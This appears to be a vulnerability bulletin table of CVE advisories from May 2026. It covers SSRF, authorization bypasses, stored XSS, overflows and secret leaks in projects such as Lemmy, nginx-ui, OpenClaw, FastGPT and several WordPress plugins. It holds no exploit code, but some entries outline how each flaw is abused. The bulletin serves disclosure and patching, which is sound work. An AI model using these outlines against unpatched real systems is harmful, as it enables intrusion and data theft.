| titraio--titra | titra is an open source time tracking project. In version 0.99.52, the globalsettings Meteor publication returns all global settings without any admin or role check. Any authenticated user can subscribe via DDP and receive sensitive configuration fields such as google_secret, openai_apikey, and google_clientid. At time of publication no public patch is available. | 2026-05-04 | 6.5 | CVE-2026-42092 | https://github.com/titraio/titra/security/advisories/GHSA-4h9p-49hg-vppw |
| GreycLab--CImg | CImg Library is a C++ library for image processing. Prior to commit 4ca26bc, there is an integer overflow vulnerability in the W*H*D size computation inside _load_pnm() that can bypass the memory allocation guard. A crafted PNM/PGM/PPM file with large dimension values causes the overflow to wrap around, allocating an undersized buffer and potentially triggering a heap buffer overflow. Any application using CImg to load untrusted image files is affected. This issue has been patched via commit 4ca26bc. | 2026-05-04 | 6.1 | CVE-2026-42144 | https://github.com/GreycLab/CImg/security/advisories/GHSA-4663-63fm-44gc https://github.com/GreycLab/CImg/issues/478 https://github.com/GreycLab/CImg/commit/4ca26bce4d8c61fcd1507d5f9401b9fb1222c27d https://github.com/GreycLab/CImg/releases/tag/v.3.7.5 |
| Erudika--scoold | Scoold is a Q&A and a knowledge sharing platform for teams. Prior to version 1.67.0, Scoold allows the admins configuration value to be modified through /api/config/set/admins with a forged Bearer token that is accepted as an admin API token. Once that setting is changed, the target email address is written to the application configuration file. The change does not become active immediately in the current process, because the ADMINS set is loaded once at startup. After a Scoold restart, though, the selected user is recognized as an administrator and gains access to the admin panel. This issue gives an attacker a reliable persistence path: write their own email into scoold.admins, wait for a restart or trigger one operationally, and the account comes back as admin. This issue has been patched in version 1.67.0. | 2026-05-08 | 6.7 | CVE-2026-42176 | https://github.com/Erudika/scoold/security/advisories/GHSA-7qfx-c234-xg4g https://github.com/Erudika/scoold/releases/tag/1.67.0 |
| LemmyNet--lemmy | Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy allows an authenticated low-privileged user to create a link post through POST /api/v3/post. When a post is created in a public community, the backend asynchronously sends a Webmention to the attacker-controlled link target. The submitted URL is checked for syntax and scheme, but the audited code path does not reject loopback, private, or link-local destinations before the Webmention request is issued. This lets a normal user trigger server-side HTTP requests toward internal services. This issue has been patched in version 0.19.18. | 2026-05-08 | 6.3 | CVE-2026-42180 | https://github.com/LemmyNet/lemmy/security/advisories/GHSA-3jvj-v6w2-h948 https://github.com/LemmyNet/lemmy/releases/tag/0.19.18 |
| LemmyNet--lemmy | Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18. | 2026-05-08 | 6.5 | CVE-2026-42181 | https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq https://github.com/LemmyNet/lemmy/releases/tag/0.19.18 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the incomplete SSRF fix in Admidio's fetch_metadata.php validates the resolved IP address but passes the original hostname-based URL to curl_init(), leaving a DNS rebinding TOCTOU window that allows redirecting requests to internal IPs. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.8 | CVE-2026-42194 | https://github.com/Admidio/admidio/security/advisories/GHSA-hcjj-chvw-fmw9 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| becheran--grid | Grid is a data structure grid for Rust. From version 0.17.0 to before version 1.0.1, an integer overflow in Grid::expand_rows() can corrupt the relationship between the grid's logical dimensions and its backing storage. After the internal invariant is broken, the safe API get() may invoke get_unchecked() with an invalid index, resulting in Undefined Behavior. This issue has been patched in version 1.0.1. | 2026-05-08 | 6.2 | CVE-2026-42199 | https://github.com/becheran/grid/security/advisories/GHSA-38c5-483c-4qqp https://github.com/becheran/grid/commit/be213bd3528727148bef2d523c89e95d1fd9c072 https://github.com/becheran/grid/releases/tag/v1.0.1 |
| almirhodzic--nova-toggle-5 | nova-toggle-5 enables flipping booleans in the index. Prior to version 1.3.0, the toggle endpoint (POST /nova-vendor/nova-toggle/toggle/{resource}/{resourceId}) was protected only by web + auth:<guard> middleware. Any user authenticated on the configured guard could call the endpoint and flip boolean attributes on any Nova resource - including users who do not have access to Nova itself (for example, frontend customers sharing the web guard with the Nova admin area). The endpoint also accepted an arbitrary attribute parameter, which meant a valid caller could toggle any boolean column on the underlying model - not just columns exposed as Toggle fields on the resource. This issue has been patched in version 1.3.0. | 2026-05-08 | 6.5 | CVE-2026-42202 | https://github.com/almirhodzic/nova-toggle-5/security/advisories/GHSA-f5c8-m5vw-rmgq https://github.com/almirhodzic/nova-toggle-5/releases/tag/v1.3.0 |
| halfgaar--FlashMQ | FlashMQ is an MQTT broker/server, designed for multi-CPU environments. Prior to version 1.26.1, a remote client with retained publish permission can crash the FlashMQ broker when both set_retained_message_defer_timeout and set_retained_message_defer_timeout_spread are configured to non-default values, resulting in denial of service. If anonymous retained publishing is allowed, no authentication is required; otherwise, the attacker needs the corresponding publish permission. This issue has been patched in version 1.26.1. | 2026-05-08 | 6.5 | CVE-2026-42209 | https://github.com/halfgaar/FlashMQ/security/advisories/GHSA-2789-vfcg-5922 https://github.com/halfgaar/FlashMQ/issues/167 https://github.com/halfgaar/FlashMQ/commit/193b6e7767889511cfa8e933908ea5e6a1077a1f https://github.com/halfgaar/FlashMQ/releases/tag/v1.26.1 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, an authenticated user can call GET /api/settings and retrieve sensitive configuration values, including node.secret. The same node.secret is accepted by AuthRequired() through the X-Node-Secret header (or node_secret query parameter), causing the request to be treated as authenticated via the trusted-node path and associated with the init user. This issue has been patched in version 2.3.8. | 2026-05-04 | 6.5 | CVE-2026-42220 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39 https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, the GetSettings API handler (api/settings/settings.go:24-65) serializes all settings structs to JSON and returns them to authenticated users. Many sensitive fields are tagged with protected:"true" - however, this tag is only enforced during writes (via ProtectedFill in SaveSettings) and is completely ignored during reads. This exposes 40+ protected fields including JwtSecret (enabling auth token forgery), NodeSecret (enabling cluster node impersonation), OIDC ClientSecret (enabling OAuth account takeover), and the IP whitelist configuration. This issue has been patched in version 2.3.8. | 2026-05-04 | 6.5 | CVE-2026-42223 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-q4w7-56hr-83rm https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
| onyx-dot-app--onyx | Onyx is an open-source AI platform. Prior to versions 3.0.9, 3.1.6, and 3.2.6, the GET /chat/file/{file_id} endpoint allows any authenticated user to download any other user's uploaded files by providing the file UUID. The endpoint verifies the caller is authenticated but never checks that the file belongs to them. An attacker who knows or obtains a file UUID can access confidential documents, chat attachments, and other files uploaded by any user in the system. This issue has been patched in versions 3.0.9, 3.1.6, and 3.2.6. | 2026-05-08 | 6.5 | CVE-2026-42277 | https://github.com/onyx-dot-app/onyx/security/advisories/GHSA-vg3h-35f7-7w6r |
| Syslifters--sysreptor | SysReptor is a fully customizable pentest reporting platform. From version 2026.4 to before version 2026.27, the endpoints for reading and creating sharing links for personal notes are not properly authorized. This allows authenticated attackers who obtain the note ID of victim users to list and create sharing links to those users' personal notes. This gives attackers read and write access to notes of other users. This exploit works in both SysReptor Professional and Community. In Community it has, however, no impact because all users have superuser permissions and can list personal notes of other users at /admin/pentests/usernotebookpage/. This issue has been patched in version 2026.27. | 2026-05-08 | 6.8 | CVE-2026-42291 | https://github.com/Syslifters/sysreptor/security/advisories/GHSA-pcpr-q2qj-3v43 https://github.com/Syslifters/sysreptor/releases/tag/2026.27 |
| labring--FastGPT | FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts is vulnerable to DNS rebinding (TOCTOU - Time-of-Check to Time-of-Use). The function resolves the hostname via dns.resolve4()/dns.resolve6() and checks resolved IPs against private ranges, but the actual HTTP request happens in a separate call with a new DNS resolution, allowing the DNS record to change between validation and fetch. At time of publication, there are no publicly available patches. | 2026-05-08 | 6.3 | CVE-2026-42344 | https://github.com/labring/FastGPT/security/advisories/GHSA-cc8x-jrqv-hmwh |
| gitroomhq--postiz-app | Postiz is an AI social media scheduling tool. From version 2.16.6 to before version 2.21.7, all SSRF protections added in v2.21.4-v2.21.6 share a fundamental TOCTOU (Time-of-Check-Time-of-Use) vulnerability: isSafePublicHttpsUrl() resolves DNS to validate the target IP, but subsequent fetch() calls resolve DNS independently. An attacker controlling a DNS server can exploit this gap via DNS rebinding to redirect requests to internal network addresses. This issue has been patched in version 2.21.7. | 2026-05-08 | 6.5 | CVE-2026-42346 | https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-f7jj-p389-4w45 https://github.com/gitroomhq/postiz-app/commit/071143dcb01cdeb9d5d7019892f4c6ff7b19dbeb https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.7 |
| GeoVision Inc.--GV-LPC2011/LPC2211 | A privilege escalation vulnerability exists in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to credentials leak. An attacker can visit a webpage to trigger this vulnerability. | 2026-05-04 | 6.5 | CVE-2026-42367 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an authorization bypass vulnerability allowing operator.write message-tool paths to access Matrix profile persistence requiring admin-level authority. Attackers can exploit insufficient access controls to mutate persistent profile configuration through non-owner message-tool runs. | 2026-05-05 | 6.5 | CVE-2026-42433 | GitHub Security Advisory (GHSA-7jp6-r74r-995q) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Unauthorized Matrix Profile Config Persistence Access via operator.write Message Tools |
| grimmory-tools--grimmory | Grimmory is a self-hosted digital library. Prior to version 2.3.1, a stored cross-site scripting (XSS) vulnerability in Grimmory's browser-based EPUB reader allows an attacker to embed arbitrary JavaScript in a crafted EPUB file. When a victim opens the book, the script executes in their browser with full access to the Grimmory application's session context. This can enable session token theft and account takeover, including administrative access if an administrator opens the affected book. This issue has been patched in version 2.3.1. | 2026-05-08 | 6.3 | CVE-2026-42451 | https://github.com/grimmory-tools/grimmory/security/advisories/GHSA-frv6-5wq5-9p24 http://github.com/grimmory-tools/grimmory/releases/tag/v2.3.1 |
| chainguard-dev--apko | apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, DiscoverKeys in pkg/apk/apk/implementation.go unconditionally type-asserts JWKS keys as *rsa.PublicKey without checking the key type. If a repository JWKS endpoint returns a non-RSA key (e.g. EC), the unchecked assertion panics and crashes apko. This affects any workflow that initializes the APK database and fetches repository keys. This issue has been patched in version 1.2.7. | 2026-05-09 | 6.5 | CVE-2026-42576 | https://github.com/chainguard-dev/apko/security/advisories/GHSA-m7hm-vm4x-28jf https://github.com/chainguard-dev/apko/commit/6604826b19e36e9bc6e196592800fad93738f4a1 https://github.com/chainguard-dev/apko/releases/tag/v1.2.7 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains a redaction bypass vulnerability that allows authenticated gateway clients to receive unredacted secrets through sourceConfig and runtimeConfig alias fields. Attackers with config read access can exploit this to obtain provider API keys, gateway authentication material, and channel credentials that should have been redacted. | 2026-05-05 | 6.5 | CVE-2026-43528 | GitHub Security Advisory (GHSA-8372-7vhw-cm6q) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.14 - Redaction Bypass via sourceConfig and runtimeConfig Aliases |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.14 contains an authorization context reuse vulnerability in collect-mode queue batches that allows messages from different senders to inherit the final sender's authorization context. Attackers can exploit this by sending multiple queued messages to drain batches using a more privileged sender's context, causing earlier messages to execute with elevated permissions. | 2026-05-05 | 6.8 | CVE-2026-43535 | GitHub Security Advisory (GHSA-jwrq-8g5x-5fhm) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.14 - Authorization Context Reuse in Collect-Mode Queue Batches |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a path traversal vulnerability in the screen_record tool's outPath parameter that bypasses workspace-only filesystem guards. Attackers can exploit this by specifying an outPath outside the workspace boundary to write files to unintended locations on the system. | 2026-05-05 | 6.5 | CVE-2026-43567 | GitHub Security Advisory (GHSA-jf25-7968-h2h5) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Path Traversal in screen_record outPath Parameter |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.5 before 2026.4.10 contain a privilege escalation vulnerability allowing write-scoped operators to modify persistent memory dreaming settings. Attackers with write-scoped gateway access can toggle admin-class configuration mutations through the /dreaming endpoint to escalate privileges. | 2026-05-05 | 6.5 | CVE-2026-43568 | GitHub Security Advisory (GHSA-5gjc-grvm-m88j) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.5 < 2026.4.10 - Privilege Escalation via Memory Dreaming Configuration in /dreaming Endpoint |
| OpenClaw--OpenClaw | OpenClaw versions 2026.3.22 before 2026.4.5 contain a symlink traversal vulnerability in remote marketplace repository path handling that allows attackers to escape the expected repository root. Attackers can exploit this by providing crafted symlink paths to access files outside the intended repository directory. | 2026-05-05 | 6.5 | CVE-2026-43570 | GitHub Security Advisory (GHSA-cr8r-7g2h-6wr6) Patch Commit (1) Patch Commit (2) VulnCheck Advisory: OpenClaw 2026.3.22 < 2026.4.5 - Symlink Traversal in Remote Marketplace Repository Path Handling |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.12 contains an improper authorization vulnerability in helper-backed channels where empty resolved approver lists are interpreted as explicit approval authorization. Attackers can resolve pending approvals without proper authorization by exploiting this logic flaw if they know an approval id. | 2026-05-05 | 6.5 | CVE-2026-43574 | GitHub Security Advisory (GHSA-49cg-279w-m73x) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.12 - Improper Authorization via Empty Approver Lists |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.9 contains a file read vulnerability allowing attackers to bypass navigation guards through browser act/evaluate interactions. Attackers can pivot into the local CDP origin and create or read disallowed file:// pages despite direct navigation policy restrictions. | 2026-05-06 | 6.5 | CVE-2026-43577 | GitHub Security Advisory (GHSA-qmwg-qprg-3j38) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.9 - Arbitrary File Read via Browser Interaction Routes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an insufficient access control vulnerability in Nostr plugin HTTP profile routes that allows operators with write permissions to persist profile configuration without requiring admin authority. Attackers with operator.write scope can modify Nostr profile settings through unprotected mutation endpoints to gain unauthorized configuration persistence. | 2026-05-06 | 6.5 | CVE-2026-43579 | GitHub Security Advisory (GHSA-f3h5-h452-vp3j) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Insufficient Access Control in Nostr Profile Mutation Routes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a server-side request forgery vulnerability in browser navigation policy that allows attackers to bypass hostname validation through DNS rebinding attacks. Attackers can exploit inconsistent hostname resolution between validation and actual network requests to pivot to internal resources via unallowlisted hostname URLs. | 2026-05-06 | 6.3 | CVE-2026-43582 | GitHub Security Advisory (GHSA-xq94-r468-qwgj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - DNS Rebinding SSRF via Hostname Validation Bypass |
| roxnor--ElementsKit Elementor Addons Advanced Widgets & Templates Addons for Elementor | The ElementsKit Elementor Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `Live_Action::reset()` function in all versions up to, and including, 3.8.2. The function is hooked to the WordPress `init` action and triggers when both `post` and `action=elementor` GET parameters are present, with no authentication or nonce verification. This makes it possible for unauthenticated attackers to overwrite the Elementor content (`_elementor_data`) of any `elementskit_widget` custom post type by visiting a specially crafted URL. The widget's custom designs, text, and configurations are permanently replaced with a blank template. | 2026-05-05 | 6.5 | CVE-2026-4362 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7740fdfb-65b2-4d27-935f-b0e73487f0c4?source=cve https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L27 https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/live-action.php#L10 https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.8.0/modules/widget-builder/init.php#L37 https://plugins.trac.wordpress.org/changeset/3499543/elementskit-lite/trunk/modules/widget-builder/live-action.php https://plugins.trac.wordpress.org/changeset?old_path=%2Felementskit-lite/tags/3.8.2&new_path=%2Felementskit-lite/tags/3.9.0 |
| wpkube--Subscribe To Comments Reloaded | The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users. | 2026-05-05 | 6.5 | CVE-2026-4409 | https://www.wordfence.com/threat-intel/vulnerabilities/id/91f9235e-f578-475f-92c3-34062d6d1e3d?source=cve https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/wp_subscribe_reloaded.php#L1613 https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/utils/stcr_utils.php#L164 https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/templates/user.php#L37 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to version 4.14.17, FastGPT had an inconsistent SSRF protection gap in MCP tool URL handling. The direct MCP preview/run endpoints already rejected internal/private network URLs, but the MCP tool create/update endpoints could still save an internal MCP server URL. That stored URL could later be used by workflow execution without revalidating the destination. An authenticated user with permission to create or manage MCP toolsets could store an internal endpoint such as http://localhost:3000/mcp and later cause the FastGPT backend workflow runner to connect to that internal destination. This issue has been patched in version 4.14.17. | 2026-05-08 | 6.3 | CVE-2026-44284 | https://github.com/labring/FastGPT/security/advisories/GHSA-cxxj-99f7-f5wq https://github.com/labring/FastGPT/pull/6826 https://github.com/labring/FastGPT/commit/c1c6b9520d976d25ed945b5bc4e0768149e6db69 https://github.com/labring/FastGPT/releases/tag/v4.14.17 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. From version 2.4.1 to before version 4.6.34, PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated name and collection arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection. This issue has been patched in version 4.6.34. | 2026-05-08 | 6.3 | CVE-2026-44337 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0450, a heap buffer overflow exists in read_compound() in src/spellfile.c when loading a crafted spell file (.spl) with UTF-8 encoding active. An attacker-controlled length field in the spell file's compound section overflows a 32-bit signed integer multiplication, causing a small buffer to be allocated for a write loop that runs many iterations, overflowing the heap. Because the 'spelllang' option can be set from a modeline, a text file modeline can trigger spell file loading if a malicious .spl file has been planted on the runtimepath. This issue has been patched in version 9.2.0450. | 2026-05-08 | 6.6 | CVE-2026-45130 | https://github.com/vim/vim/security/advisories/GHSA-q4jv-r9gj-6cwv https://github.com/vim/vim/commit/92993329178cb1f72d700fff45ca86e1c2d369f8 https://github.com/vim/vim/releases/tag/v9.2.0450 |
| Hex-Rays--IDA | Hex-Rays IDA Pro 9.2 and 9.3 before 9.3sp2 does not block Clang dependency-file generation (via argument injection), which allows attackers to place their code into a plugins directory if the victim uses an attacker-supplied .i64 file. | 2026-05-09 | 6.5 | CVE-2026-45181 | https://blog.calif.io/p/using-ida-to-find-bugs-in-ida-with https://docs.hex-rays.com/release-notes/9_3sp2 |
| KDE--Kdenlive | Kdenlive before 26.04.1 allows dangerous proxy parameters when an attacker-controlled project file is used. | 2026-05-09 | 6.5 | CVE-2026-45184 | https://commits.kde.org/kdenlive/94042ddd259551e4a7a5f6672329752972c84685 https://commits.kde.org/kdenlive/c3999aacc6da54756f3df8aab03b900459562ecd https://kde.org/info/security/advisory-20260508-1.txt |
| shapedplugin--Carousel, Slider, Photo Gallery with Lightbox, Video Slider, by WP Carousel | The WP Carousel Free plugin for WordPress is vulnerable to Stored Cross-Site Scripting via crafted fancybox `data-caption` attributes in all versions up to, and including, 2.7.10. This is due to the `fancybox-config.js` script reading the carousel container's `id` attribute directly from the DOM to construct a jQuery selector without sanitization. When a Contributor crafts an HTML block with a malformed carousel container ID (containing characters invalid for jQuery selectors), the custom fancybox configuration throws a JavaScript error and fails to initialize. This causes the bundled fancybox library (v3.5.7) to fall back to its default caption handling, which renders the `data-caption` attribute content as raw HTML. Since WordPress allows `data-*` attributes through `wp_kses_post()`, this makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks an image in the crafted carousel lightbox. | 2026-05-05 | 6.4 | CVE-2026-4665 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e75815a3-2414-47f3-b0c4-e5d3e2cb369d?source=cve https://plugins.trac.wordpress.org/browser/wp-carousel-free/tags/2.7.10/public/js/fancybox-config.js#L3 https://plugins.trac.wordpress.org/browser/wp-carousel-free/trunk/public/js/fancybox-config.js#L3 https://plugins.trac.wordpress.org/changeset/3506878/wp-carousel-free/trunk/public/js/fancybox.js |
| commonninja--Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website | The Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-4730 | https://www.wordfence.com/threat-intel/vulnerabilities/id/491c7680-d270-41ed-a756-9397a0bd86bc?source=cve https://wordpress.org/plugins/charts-ninja-graphs-and-charts https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/tags/2.1.0/chartsninja.php#L24 https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/trunk/chartsninja.php#L24 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.6.10.6. This is due to a flawed authorization logic in the nonce_permissions_check() method combined with the public exposure of a site-wide reusable nonce. The plugin exposes a public_nonce value through the /wp-json/ssa/v1/embed-inner endpoint, which is accessible to unauthenticated users. The appointment deletion endpoint at /wp-json/ssa/v1/appointments/{id}/delete and /wp-json/ssa/v1/appointments/bulk use a permission check that accepts requests containing both an X-WP-Nonce header (with any arbitrary value) and an X-PUBLIC-Nonce header (with the valid public nonce). When the X-WP-Nonce validation fails, the function falls back to validating the X-PUBLIC-Nonce without properly rejecting the request. Since the public_nonce is exposed to all unauthenticated visitors and is site-wide (not user-specific or appointment-specific), attackers can obtain it and use it to view details of arbitrary appointments, including the public_edit_url, or delete arbitrary appointments by ID. This makes it possible for unauthenticated attackers to view, delete or modify any appointment in the system, disclosing sensitive appointment data, causing service disruption, and loss of booking records. | 2026-05-07 | 6.5 | CVE-2026-4807 | https://www.wordfence.com/threat-intel/vulnerabilities/id/436ab843-7729-4d57-9c9e-2ede2f101ddb?source=cve https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/lib/td-util/class-td-api-model.php#L361 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/lib/td-util/class-td-api-model.php#L110 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/class-appointment-model.php#L698 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/class-shortcodes.php#L889 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/booking-app-new/iframe-inner.php#L444 https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.9.29/includes/class-bootstrap.php#L151 https://plugins.trac.wordpress.org/changeset/3511993/simply-schedule-appointments/trunk/includes |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Instagram Feed widget's 'instagram_follow_text' setting in all versions up to, and including, 1.7.1056 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that exploitation requires that an administrator has previously configured the Instagram Feed widget with a valid Instagram access token on the site. | 2026-05-05 | 6.4 | CVE-2026-5159 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ee96d8c5-baf0-4c5c-9ace-e88bbb95ee0a?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5528-L5530 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L5623-L5625 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193 https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1050/modules/instagram-feed/widgets/wpr-instagram-feed.php#L2181-L2193 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3514368%40royal-elementor-addons%2Ftrunk&old=3503219%40royal-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= |
| mirceatm--NMR Strava activities | The NMR Strava activities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `strava_nmr_connect` shortcode in all versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-08 | 6.4 | CVE-2026-5341 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e033919-ca00-4789-8635-b4189e1499ef?source=cve https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.14/nmr-strava-activities.php#L247 https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.14/nmr-strava-activities.php#L259 https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.15/nmr-strava-activities.php#L240 https://plugins.trac.wordpress.org/browser/nmr-strava-activities/tags/1.0.15/nmr-strava-activities.php#L251 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3524779%40nmr-strava-activities%2Ftrunk&old=3520018%40nmr-strava-activities%2Ftrunk&sfp_email=&sfph_mail= |
| bitacre--WP-Clippy | The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-5505 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ec49ed83-a09d-460d-be34-0fb79032b543?source=cve https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L23 https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L23 https://plugins.trac.wordpress.org/browser/wp-clippy/tags/1.0.0/wp-clippy.php#L26 https://plugins.trac.wordpress.org/browser/wp-clippy/trunk/wp-clippy.php#L26 |
| servmask--All-in-One WP Migration Unlimited Extension | The All-in-One WP Migration Unlimited Extension plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.83. This is due to the 'Ai1wmve_Schedules_Controller::save' handler for 'admin_post_ai1wm_schedule_event_save' not verifying user capabilities before saving schedule data. This makes it possible for authenticated attackers, with subscriber-level access and above, to create scheduled export jobs and send backup notifications to attacker-controlled email addresses. Because such notifications include the random backup filename, full site backups can subsequently be downloaded from the target site, resulting in sensitive information exposure. | 2026-05-06 | 6.5 | CVE-2026-5753 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8a31080-c124-49be-b9d1-7bc5abe7cbda?source=cve https://help.servmask.com/knowledgebase/unlimited-extension-changelog/ |
| DivvyDrive Information Technologies Inc.--DivvyDrive | Cross-Site request forgery (CSRF) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross Site Request Forgery. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 6.5 | CVE-2026-5791 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
